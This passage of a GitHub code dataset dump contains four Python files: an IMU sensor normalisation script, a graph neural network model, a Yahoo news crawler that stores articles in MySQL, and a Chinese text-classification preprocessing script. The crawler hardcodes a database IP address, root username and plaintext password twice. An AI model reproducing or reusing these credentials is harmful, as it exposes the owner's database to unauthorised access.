"usage_type": "call"}, {"api_name": "math.floor", "line_number": 299, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 305, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 312, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 313, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 328, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 328, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "6417899803", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 10 17:26:32 2021\n\n@author: nilah\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport csv_reader\nimport datetime\n\n\nheaders_annotated = ['Time', 'Class', 'AccX_L', 'AccY_L', 'AccZ_L', 'GyrX_L', 'GyrY_L', 'GyrZ_L',\n 'MagX_L', 'MagY_L', 'MagZ_L', 'AccX_T', 'AccY_T', 'AccZ_T', 'GyrX_T', 'GyrY_T',\n 'GyrZ_T', 'MagX_T', 'MagY_T', 'MagZ_T', 'AccX_R', 'AccY_R', 'AccZ_R', 'GyrX_R',\n 'GyrY_R', 'GyrZ_R', 'MagX_R', 'MagY_R', 'MagZ_R']\n\nheaders = ['Time', 'AccX_L', 'AccY_L', 'AccZ_L', 
'GyrX_L', 'GyrY_L', 'GyrZ_L',\n           'MagX_L', 'MagY_L', 'MagZ_L', 'AccX_T', 'AccY_T', 'AccZ_T', 'GyrX_T', 'GyrY_T',\n           'GyrZ_T', 'MagX_T', 'MagY_T', 'MagZ_T', 'AccX_R', 'AccY_R', 'AccZ_R', 'GyrX_R',\n           'GyrY_R', 'GyrZ_R', 'MagX_R', 'MagY_R', 'MagZ_R']\n\nSCENARIO = {'R01': 'L01', 'R02': 'L01', 'R03': 'L02', 'R04': 'L02', 'R05': 'L02', 'R06': 'L02', 'R07': 'L02',\n            'R08': 'L02', 'R09': 'L02', 'R10': 'L02', 'R11': 'L02', 'R12': 'L02', 'R13': 'L02', 'R14': 'L02',\n            'R15': 'L02', 'R16': 'L02', 'R17': 'L03', 'R18': 'L03', 'R19': 'L03', 'R20': 'L03', 'R21': 'L03',\n            'R22': 'L03', 'R23': 'L03', 'R24': 'L03', 'R25': 'L03', 'R26': 'L03', 'R27': 'L03', 'R28': 'L03',\n            'R29': 'L03', 'R30': 'L03'}\n\nlabels_persons = {\"S01\": 0, \"S02\": 1, \"S03\": 2, \"S04\": 3, \"S05\": 4, \"S06\": 5, \"S07\": 6, \"S08\": 7, \"S09\": 8,\n                  \"S10\": 9, \"S11\": 10, \"S12\": 11, \"S13\": 12, \"S14\": 13, \"S15\": 14, \"S16\": 15}\n\ndef read_extracted_data(path, skiprows = 1):\n    '''\n    gets data from csv file\n    data contains 3 columns, start, end and label\n\n    returns a numpy array\n\n    @param path: path to file\n    '''\n\n    annotation_original = np.loadtxt(path, delimiter=',', skiprows=skiprows)\n    return annotation_original\n\ndef statistics_measurements():\n    '''\n    Computes some statistics over the channels for the entire training data\n\n    returns a max_values, min_values, mean_values, std_values\n    '''\n\n    #dataset_path_imu = \"/vol/actrec/DFG_Project/2019/LARa_dataset/Motionminers/2019/flw_recordings_12000/\"\n    dataset_path_imu = \"/vol/actrec/DFG_Project/2019/LARa_dataset/Mbientlab/LARa_dataset_mbientlab/\"\n    \n    '''\n    #train_final_ids = [\"S07\", \"S08\", \"S09\", \"S10\", \"S11\", \"S12\"]\n\n    persons = [\"S07\", \"S08\", \"S09\", \"S13\", \"S14\"]\n    #recordings = ['R{:02d}'.format(r) for r in range(1, 31)]\n    \n    persons = [\"S07\", \"S08\", \"S09\", \"S13\", \"S14\"]\n    train_ids = [\"R03\", \"R07\", \"R08\", \"R10\", \"R11\", \"R12\", \"R15\", \"R18\", \"R19\", \"R21\", \"R22\"]\n    '''\n    \n    persons = [\"S07\", \"S08\", \"S09\", \"S10\", \"S11\", \"S12\", \"S13\", \"S14\"]\n    train_ids = [\"R01\", \"R02\", \"R03\", \"R04\", \"R05\", \"R06\",\"R07\", \"R08\", \"R09\", \"R10\", \"R13\", \"R14\", \"R16\", \"R17\",\n                 \"R18\", \"R19\", \"R20\", \"R21\", \"R22\", \"R23\", \"R24\", \"R25\", \"R26\", \"R27\", \"R28\", \"R29\", \"R30\"]\n    #val_ids = [\"R12\"]\n    #test_ids = [\"R15\"]\n    IMU = []\n    time = []\n    data = []\n\n    accumulator_measurements = np.empty((0, 30))\n    for P in persons:\n        for R in train_ids:\n            S = SCENARIO[R]\n            file_name_data = \"{}/{}_{}_{}.csv\".format(P, S, P, R)\n            file_name_label = \"{}/{}_{}_{}_labels.csv\".format(P, S, P, R)\n            print(\"------------------------------\\n{}\".format(file_name_data))\n            # getting data\n            path=dataset_path_imu + file_name_data\n            pathlabels= dataset_path_imu + file_name_label\n            try:\n                with open(path, 'r') as csvfile:\n                    spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n                    for row in spamreader:\n                        try:\n                            if spamreader.line_num == 1:\n                                # print('\\n')\n                                print(', '.join(row))\n                            else:\n                                if len(row) != 31:\n                                    idx_row = 0\n                                    IMU.append(row[idx_row])\n                                    idx_row += 1\n                                else:\n                                    idx_row = 0\n                                try:\n                                    time_d = datetime.datetime.strptime(row[idx_row], '%Y-%m-%d %H:%M:%S.%f')\n                                    idx_row += 1\n                                except:\n                                    try:\n                                        time_d = datetime.datetime.strptime(row[idx_row], '%Y-%m-%d %H:%M:%S')\n                                        idx_row += 1\n                                    except:\n                                        print(\"strange time str {}\".format(row[idx_row]))\n                                        continue\n                                time.append(time_d)\n                                data.append(list(map(float, row[idx_row:])))\n                        except:\n                            print(\"Error in line 
{}\".format(row))\n except KeyboardInterrupt:\n print('\\nYou cancelled the operation.')\n except:\n print(\"\\n no file called file {}\".format(dataset_path_imu + file_name_data))\n continue\n \n print(len(data[0]))\n print(len(data[1]))\n \n if len(row) != 31:\n imu_data = {'IMU': IMU, 'time': time, 'data': data}\n else:\n try:\n print(\"check\")\n imu_data = {'time': time, 'data': data}\n data_new=np.asarray(data)\n print(data_new.shape)\n print(accumulator_measurements.shape)\n accumulator_measurements = np.append(accumulator_measurements, data_new, axis=0)\n print(\"\\nFiles loaded\")\n except:\n print(\"\\n1 In loading data, in file {}\".format(dataset_path_imu + file_name_data))\n continue\n \n \n try:\n max_values = np.max(accumulator_measurements, axis=0)\n print(\"Max values\")\n print(max_values)\n min_values = np.min(accumulator_measurements, axis=0)\n print(\"Min values\")\n print(min_values)\n mean_values = np.mean(accumulator_measurements, axis=0)\n print(\"Mean values\")\n print(mean_values)\n std_values = np.std(accumulator_measurements, axis=0)\n print(\"std values\")\n print(std_values)\n except:\n max_values = 0\n min_values = 0\n mean_values = 0\n std_values = 0\n print(\"Error computing statistics\")\n \n return max_values, min_values, mean_values, std_values\n\nif __name__ == '__main__':\n \n #Computing Statistics of data\n max_values, min_values, mean_values, std_values = statistics_measurements()\n \n x = []\n x.append(list(max_values))\n x.append(list(min_values))\n x.append(list(mean_values))\n x.append(list(std_values))\n x=np.asarray(x)\n print(x)\n \n base_directory='/data/nnair/cmu/norm/'\n \n csv_dir= base_directory+\"norm_brownie_mgx.csv\"\n print(csv_dir)\n np.savetxt(csv_dir, x, delimiter=\"\\n\", fmt='%s')", "repo_name": "nilahnair/Master_Thesis_2021", "sub_path": "types_normalisation_values_imu.py", "file_name": "types_normalisation_values_imu.py", "file_ext": "py", "file_size_in_byte": 7675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.loadtxt", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 77, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 104, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 181, "usage_type": "call"}]} +{"seq_id": "17200202499", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import ModuleList, Dropout, ReLU\nfrom torch_geometric.nn import GCNConv, RGCNConv, SAGEConv, GINConv, FiLMConv, global_mean_pool\n\nclass RGINConv(torch.nn.Module):\n def __init__(self, in_features, out_features, num_relations):\n super(RGINConv, self).__init__()\n 
self.in_features = in_features\n self.out_features = out_features\n self.num_relations = num_relations\n self.self_loop_conv = torch.nn.Linear(in_features, out_features)\n convs = []\n for i in range(self.num_relations):\n convs.append(GINConv(nn.Sequential(nn.Linear(in_features, out_features),nn.BatchNorm1d(out_features), nn.ReLU(),nn.Linear(out_features, out_features))))\n self.convs = ModuleList(convs)\n def forward(self, x, edge_index, edge_type):\n x_new = self.self_loop_conv(x)\n for i, conv in enumerate(self.convs):\n rel_edge_index = edge_index[:, edge_type==i]\n x_new += conv(x, rel_edge_index)\n return x_new\n\nclass GCN(torch.nn.Module):\n def __init__(self, args):\n super(GCN, self).__init__()\n self.args = args\n self.num_relations = args.num_relations\n self.layer_type = args.layer_type\n num_features = [args.input_dim] + list(args.hidden_layers) + [args.output_dim]\n self.num_layers = len(num_features) - 1\n layers = []\n for i, (in_features, out_features) in enumerate(zip(num_features[:-1], num_features[1:])):\n layers.append(self.get_layer(in_features, out_features))\n self.layers = ModuleList(layers)\n\n self.reg_params = list(layers[0].parameters())\n self.non_reg_params = list([p for l in layers[1:] for p in l.parameters()])\n\n self.dropout = Dropout(p=args.dropout)\n self.act_fn = ReLU()\n def get_layer(self, in_features, out_features):\n if self.layer_type == \"GCN\":\n return GCNConv(in_features, out_features)\n elif self.layer_type == \"R-GCN\":\n return RGCNConv(in_features, out_features, self.num_relations)\n elif self.layer_type == \"GIN\":\n return GINConv(nn.Sequential(nn.Linear(in_features, out_features),nn.BatchNorm1d(out_features), nn.ReLU(),nn.Linear(out_features, out_features)))\n elif self.layer_type == \"R-GIN\":\n return RGINConv(in_features, out_features, self.num_relations)\n elif self.layer_type == \"SAGE\":\n return SAGEConv(in_features, out_features)\n elif self.layer_type == \"FiLM\":\n return FiLMConv(in_features, out_features)\n def reset_parameters(self):\n for layer in self.layers:\n layer.reset_parameters()\n\n def forward(self, graph):\n x, edge_index = graph.x, graph.edge_index\n for i, layer in enumerate(self.layers):\n if self.layer_type in [\"R-GCN\", \"R-GIN\"]:\n x = layer(x, edge_index, edge_type=graph.edge_type)\n else:\n x = layer(x, edge_index)\n if i != self.num_layers - 1:\n x = self.act_fn(x)\n x = self.dropout(x)\n return x\n", "repo_name": "Fsoft-AIC/Batch-Ollivier-Ricci-Flow", "sub_path": "models/node_model.py", "file_name": "node_model.py", "file_ext": "py", "file_size_in_byte": 3134, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GINConv", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": 
"torch.nn.ModuleList", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 41, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 44, "usage_type": "call"}, {"api_name": "torch_geometric.nn.RGCNConv", "line_number": 46, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GINConv", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch_geometric.nn.SAGEConv", "line_number": 52, "usage_type": "call"}, {"api_name": "torch_geometric.nn.FiLMConv", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "29746817201", "text": "# for dbmaker\n# for ettoday\n# 日期往前抓一個月\n# coding=utf-8\nfrom lxml import etree, html\nfrom lxml.html import fromstring\nfrom time import sleep\nfrom datetime import datetime, date, time, timedelta\nimport requests, json, pyodbc, threading, queue\nimport sys\nimport MySQLdb\n\nclass Constant:\n URL_Root = \"https://tw.news.yahoo.com/\"\n URL_Entrance = \"https://tw.news.yahoo.com/finance\"\n WORKERLIMIT = 1\n\nclass News:\n def __init__(self, category, url):\n self.category = category\n self.entranceUrl = url\n self.url = Constant.URL_Root + url\n self.lastNewsPublished = \"\"\n self.cnxn = MySQLdb.connect(\"139.162.23.125\", \"root\", \"DifficulT7130\", \"cybersite\", use_unicode=True, charset=\"utf8\")\n writeLog ('I', \"connect to database\")\n def do(self):\n #self.cnxn = pyodbc.connect('Driver={DBMaker 5.4 Driver};Database=CYBERSITE;Uid=SYSADM;Pwd=;')\n self.cursor = self.cnxn.cursor()\n writeLog ('I', \"search: (%s)\" % (self.category))\n\n # 可否再透過日期查詢下去\n canSearchAgain = True\n\n # 目前日期查詢結果有無下一頁可搜尋\n hasNextPage = True\n\n while canSearchAgain:\n canSearchAgain = False\n hasNextPage = True\n while hasNextPage:\n hasNextPage = False\n result = tryRequestURL(threading.current_thread().name, self.entranceUrl)\n print (self.entranceUrl)\n root = fromstring(result.text)\n news = root.xpath(\"//div[@class='Ov(h) Pend(44px) Pstart(25px)']/h3/a | //div[@class='Ov(h) Pend(14%) Pend(44px)--sm1024']/h3/a \")\n print (len(news))\n if len(news) == 0:\n writeLog('W', \"search: (%s) no result\" % self.category)\n self.lastNewsPublished = \"\"\n return\n for new in news:\n self.fetchNewsContent(Constant.URL_Root+new.get('href'))\n\n writeLog('I', \"category: %s, run end of page\" % self.category)\n\n self.cursor.close()\n self.cnxn.close()\n\n def fetchNewsContent(self, url):\n result = tryRequestURL(threading.current_thread().name, url)\n root = fromstring(result.text)\n newspublished = root.xpath(\"//time[@class='date Fz(13px) Fw(n) D(tbc) Va(m) D(ib)']\")\n if len(newspublished) == 0:\n writeLog('W', \"error to parse timestamp in url: %s\" % url)\n return\n else:\n newspublished = newspublished[0].text.strip()\n newspublished = datetime.strptime(newspublished, \"%Y年%m月%d日\")\n\n headline = root.xpath(\"//h1[@class='Lh(1.39) Fz(25px)--sm Fz(36px) Ff($ff-primary) Lts($lspacing-md) Fw($fweight) Fsm($fsmoothing) Fsmw($fsmoothing) Fsmm($fsmoothing) Wow(bw)']\")\n if len(headline) == 0:\n writeLog('W', \"error to parse headline in url: %s\" % url)\n return\n else:\n 
headline = headline[0].text\n\n        author = root.xpath(\"//div[@class='author-name C(#000) Fw(b)'] | //a[@class='C(#222)'] | //a[@class='author-link Td(u):h C(#000) Fw(b)']\")\n        if len(author) == 0:\n            writeLog('W', \"error to parse author in url: %s\" % url)\n            return\n        else:\n            author = author[0].text\n\n        contents = root.xpath(\"//div[@class='canvas-body Wow(bw) Cl(start) Mb(20px) Lh(1.7) Fz(18px) D(i)']/p\")\n        if len(contents) == 0:\n            writeLog('W', \"error to parse content in url: %s\" % url)\n            return\n        else:\n            for c in contents[0:5]:\n                authorDict = c.text_content().split('/')\n\n        writeLog('I', 'headline: %s, category: %s, newspublished: %s' % (headline, self.category, newspublished))\n        writeLog('I', 'author: %s' % (author))\n        self.lastNewsPublished = str(newspublished)\n        self.insert_data(headline, \"\\n\".join([c.text_content().strip() for c in contents]), author, newspublished, url, self.category)\n\n    def insert_data(self, headline, paragraph, author, createtime, url, category):\n        writeLog(\"I\", \"[%s], search record: %s, %s\" % (threading.current_thread().name, headline, author))\n        paragraph = paragraph.replace(\"\\n\", \"\")\n        while True:\n            try:\n                self.cursor.execute(\"select count(*) from yahoo where headlines=%s and author=%s\" , (headline, author))\n                break\n            except MySQLdb.Error as err:\n                writeLog('E', \"database err happened in find duplicate record: %s\" % err)\n                self.reconnectDB()\n            else:\n                writeLog('E', \"database didn't catch err with find duplicate record\")\n                self.reconnectDB()\n\n        row = self.cursor.fetchone()\n        if row[0] != 0:\n            writeLog(\"I\", '[%s], headline: %s already in record' % (threading.current_thread().name, headline))\n        else:\n            while True:\n                try:\n                    djson ={\"JHEADLINE\":headline,\"JCONTENT\":paragraph,\"JCATEGORY\":category,\"JAUTHOR\":author,\"JNEWSPUBLISHED\":str(createtime),\"JURL\":url}\n                    myjson = json.dumps(djson)\n                    self.cursor.execute(\"insert into yahoo (headlines, content, author, newspublished, url, category,djson) values (%s,%s,%s,%s,%s,%s,%s)\", (headline, paragraph, author, createtime, url, category,myjson))\n                    self.cnxn.commit()\n                    writeLog(\"I\", '[%s], headline: %s insert success' % (threading.current_thread().name, headline))\n                    break\n                except MySQLdb.Error as err:\n                    writeLog('E', \"database err happened in insert new record: %s\" % err)\n                    self.reconnectDB()\n                else:\n                    writeLog('E', \"database didn't catch err with condition insert new record\")\n                    self.reconnectDB()\n            return True\n\n    def reconnectDB(self):\n        writeLog('I', \"start to reconnect connection\")\n        #self.cnxn = pyodbc.connect('Driver={DBMaker 5.4 Driver};Database=CYBERSITE;Uid=SYSADM;Pwd=;')\n        self.cnxn = MySQLdb.connect(\"139.162.23.125\", \"root\", \"DifficulT7130\", \"cybersite\", use_unicode=True, charset=\"utf8\")\n        self.cursor = self.cnxn.cursor()\n\n###### global function ######\n\ndef getSelectConditions():\n    categoryDict = []\n    result = tryRequestURL('main', Constant.URL_Entrance)\n    root = fromstring(result.text)\n    categorys = root.xpath(\"//div[@id='nr-secondtier-nav-main']/div/ul/li/a\")\n    idx = 0\n    for category in categorys[0:]:\n        idx = idx + 1\n        if idx == 2 or idx == 3:\n            continue\n        if idx > 5:\n            break\n        categoryDict.append({'name': category.get('title'), 'url': category.get('href')})\n        print (category.get('title'))\n    return categoryDict\n\ndef tryRequestURL(threadName, url):\n    tryTimes = 5\n    result = \"\"\n    while tryTimes > 0:\n        try:\n            result = requests.get(url, timeout=10)\n        except requests.exceptions.Timeout as e:\n            writeLog(\"W\", '[%s], timeout err: %s' % (threadName, e))\n            
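# editor's comment: on a timeout, spend one retry and back off briefly before the next attempt\n            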
tryTimes -= 1\n            writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n            sleep(3)\n            continue\n        except requests.exceptions.ReadTimeout as e:\n            writeLog(\"W\", '[%s], read timeout err: %s' % (threadName, e))\n            tryTimes -= 1\n            writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n            sleep(3)\n            continue\n        except requests.packages.urllib3.exceptions.ReadTimeoutError as e:\n            writeLog(\"W\", '[%s], urllib3 read timeout err: %s' % (threadName, e))\n            tryTimes -= 1\n            writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n            sleep(3)\n            continue\n        except requests.exceptions.TooManyRedirects as e:\n            writeLog(\"W\", '[%s], too many redirect %s' % (threadName, e))\n            tryTimes -= 1\n            writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n            sleep(3)\n            continue\n        except requests.exceptions.RequestException as e:\n            writeLog(\"W\", '[%s], request error: %s' % (threadName, e))\n            tryTimes -= 1\n            writeLog(\"W\", '[%s], last %d retry chance' % (threadName, tryTimes))\n            sleep(3)\n            continue\n        break\n    if result != \"\":\n        result.encoding='utf8'\n    return result\n\ndef writeLog(level, message):\n    global file_\n    message = \"Log %s %s %s\" % (level, datetime.now().time(), message)\n    file_.write(\"%s\\n\" % message)\n    #print(message)\n\ndef startCrawler(*args):\n    queue = args[0]\n    while queue.qsize() > 0:\n        job = queue.get()\n        job.do()\n\n###### end of global function ######\n\ndef main():\n    global file_\n    que = queue.Queue()\n\n    selections = getSelectConditions()\n    for category in selections:\n        que.put(News(category['name'], category['url']) )\n\n    writeLog(\"I\", \"[Info] Worker size={%d}...\" % que.qsize())\n\n    newsList = []\n\n    # hand the jobs out to the worker threads\n    for i in range(Constant.WORKERLIMIT):\n        worker = threading.Thread(target=startCrawler, name='thd%d' % i, args=(que,))\n        newsList.append(worker)\n        worker.start()\n\n    for i in range(Constant.WORKERLIMIT):\n        newsList[i].join()\n\n    writeLog(\"I\", 'all threads done')\n    file_.close()\n\nif __name__ == \"__main__\":\n    file_ = open('yahoo.log', mode='a', encoding='utf-8')\n    main()\n", "repo_name": "lisa850728g/crawler", "sub_path": "yahoo.py", "file_name": "yahoo.py", "file_ext": "py", "file_size_in_byte": 9523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "MySQLdb.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "threading.current_thread", "line_number": 42, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 44, "usage_type": "call"}, {"api_name": "threading.current_thread", "line_number": 60, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "name"}, {"api_name": "threading.current_thread", "line_number": 98, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 104, "usage_type": "attribute"}, {"api_name": "threading.current_thread", "line_number": 113, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 118, "usage_type": "call"}, {"api_name": "threading.current_thread", "line_number": 121, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 123, "usage_type": "attribute"}, {"api_name": "MySQLdb.connect", "line_number": 134, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 142, "usage_type": "call"}, {"api_name": "requests.get", 
"line_number": 160, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 161, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 165, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 167, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 171, "usage_type": "call"}, {"api_name": "requests.packages", "line_number": 173, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 177, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 179, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 183, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 185, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 189, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 198, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 198, "usage_type": "name"}, {"api_name": "queue.qsize", "line_number": 204, "usage_type": "call"}, {"api_name": "queue.get", "line_number": 205, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 212, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 224, "usage_type": "call"}]} +{"seq_id": "71138603005", "text": "import os\r\nimport jieba\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport math\r\n\r\ntrain_dir = './data/text_category/train'\r\ntrain_segment_dir = './data/text_category/train_segment.txt'\r\ntrain_list_dir = './data/text_category/train_list.txt'\r\n\r\n\r\n# 将文件中的句子通过jieba库拆分为单个词\r\ndef segment_word(input_file, output_file):\r\n # 循环遍历训练数据集的每一个文件\r\n for root, folders, files in os.walk(input_file):\r\n print('root:', root)\r\n for folder in folders:\r\n print('dir:', folder)\r\n for file in files:\r\n file_dir = os.path.join(root, file)\r\n with open(file_dir, 'rb') as in_file:\r\n # 读取文件中的文本\r\n sentence = in_file.read()\r\n # 通过jieba函数库将句子拆分为单个词组\r\n words = jieba.cut(sentence)\r\n # 文件夹路径最后两个字即为分类名\r\n content = root[-2:] + '\\t'\r\n # 去除词组中的空格,排除为空的词组\r\n for word in words:\r\n word = word.strip(' ')\r\n if word != '':\r\n content += word + ' '\r\n # 换行并将文本写入输出文件\r\n content += '\\n'\r\n with open(output_file, 'a') as outfile:\r\n outfile.write(content.strip(' '))\r\n\r\n\r\n# 统计每个词出现的频率\r\ndef get_list(segment_file, out_file):\r\n # 通过词典保存每个词组出现的频率\r\n word_dict = {}\r\n with open(segment_file, 'r') as seg_file:\r\n lines = seg_file.readlines()\r\n # 遍历文件的每一行\r\n for line in lines:\r\n line = line.strip('\\r\\n')\r\n # 将一行按空格拆分为每个词,统计词典\r\n for word in line.split(' '):\r\n # 如果这个词组没有在word_dict词典中出现过,则新建词典项并设为0\r\n word_dict.setdefault(word, 0)\r\n # 将词典word_dict中词组word对应的项计数加一\r\n word_dict[word] += 1\r\n # 将词典中的列表排序,关键字为列表下标为1的项,且逆序\r\n sorted_list = sorted(word_dict.items(), key=lambda d: d[1], reverse=True)\r\n with open(out_file, 'w') as outfile:\r\n # 将排序后的每条词典项写入文件\r\n for item in sorted_list:\r\n outfile.write('%s\\t%d\\n' % (item[0], item[1]))\r\n\r\n\r\n# segment_word(train_dir, train_segment_dir)\r\n# get_list(train_segment_dir,train_list_dir)\r\n\r\n# 通过RNN网络进行文本分类训练\r\n# 1、封装数据集类,提供接口next_batch用于连续批次数据读取\r\n# 2、封装词表,将句子转化为词语id。类别封装,将输入词语类别转为id\r\n# 3、构建网络模型,输入进行embedding,之后经过LSTM层,全连接层,然后进行训练\r\n\r\n# 定义超参数\r\nembedding_size = 32 # 每个词组向量的长度\r\nmax_words = 10 # 一个句子最大词组长度\r\nlstm_layers = 2 # lstm网络层数\r\nlstm_nodes = [64, 64] # lstm每层结点数\r\nfc_nodes = 64 # 全连接层结点数\r\nbatch_size = 100 # 每个批次样本数据\r\nlstm_grads = 1.0 # lstm网络梯度\r\nlearning_rate = 0.001 # 学习率\r\nword_threshold = 10 # 
\r\nnum_classes = 4 # the final classification has 4 categories\r\n\r\n\r\n\r\nclass Word_list:\r\n    def __init__(self, filename):\r\n        # store the tokens to count and their frequencies in a dict\r\n        self._word_dic = {}\r\n        with open(filename, 'r') as f:\r\n            lines = f.readlines()\r\n            for line in lines:\r\n                res = line.strip('\\r\\n').split('\\t')[0:2]\r\n                if len(res) < 2:\r\n                    continue\r\n                else:\r\n                    word, freq = res\r\n                    if freq.isdigit():\r\n                        freq = int(freq)\r\n                    else:\r\n                        continue\r\n                    # skip tokens whose frequency is below the threshold\r\n                    if freq < word_threshold:\r\n                        continue\r\n                    # tokens are unique, so append in order; the next token id is the current size of word_dic\r\n                    word_id = len(self._word_dic)\r\n                    self._word_dic[word] = word_id\r\n\r\n    def sentence2id(self, sentence):\r\n        # map a space-separated sentence to the token ids in word_dic, returning -1 for unknown tokens\r\n        sentence_id = [self._word_dic.get(word, -1)\r\n                       for word in sentence.split()]\r\n        return sentence_id\r\n\r\n\r\ntrain_list = Word_list(train_list_dir)\r\n\r\n\r\nclass TextData:\r\n    def __init__(self, segment_file, word_list):\r\n        self.inputs = []\r\n        self.labels = []\r\n        # manage the text categories with a dict\r\n        self.label_dic = {'体育': 0, '校园': 1, '女性': 2, '文学': 3}\r\n        self.index = 0\r\n\r\n        with open(segment_file, 'r') as f:\r\n            lines = f.readlines()\r\n            for line in lines:\r\n                # each line is tab-separated: the category first, the sentence second\r\n                res = line.strip('\\r\\n').split('\\t')[0:2]\r\n                if len(res) < 2:\r\n                    continue\r\n                else:\r\n                    label, content = res\r\n                self.content_size = len(content)\r\n                # convert the category to a numeric id\r\n                label_id = self.label_dic.get(label)\r\n                # convert the sentence to an array of ids for the embedding\r\n                content_id = word_list.sentence2id(content)\r\n                # if the sentence has more tokens than the maximum, keep only the first max_words ids\r\n                content_id = content_id[0:max_words]\r\n                # otherwise pad with -1 up to a length of max_words\r\n                padding_num = max_words - len(content_id)\r\n                content_id = content_id + [-1 for i in range(padding_num)]\r\n                self.inputs.append(content_id)\r\n                self.labels.append(label_id)\r\n        self.inputs = np.asarray(self.inputs, dtype=np.int32)\r\n        self.labels = np.asarray(self.labels, dtype=np.int32)\r\n        self._shuffle_data()\r\n\r\n    # shuffle the data as (input, label) pairs\r\n    def _shuffle_data(self):\r\n        r_index = np.random.permutation(len(self.inputs))\r\n        self.inputs = self.inputs[r_index]\r\n        self.labels = self.labels[r_index]\r\n\r\n    # return one batch of data\r\n    def next_batch(self, batch_size):\r\n        # current index + batch size gives the end index of the batch\r\n        end_index = self.index + batch_size\r\n        # if the end index exceeds the number of samples, reshuffle everything and start over\r\n        if end_index > 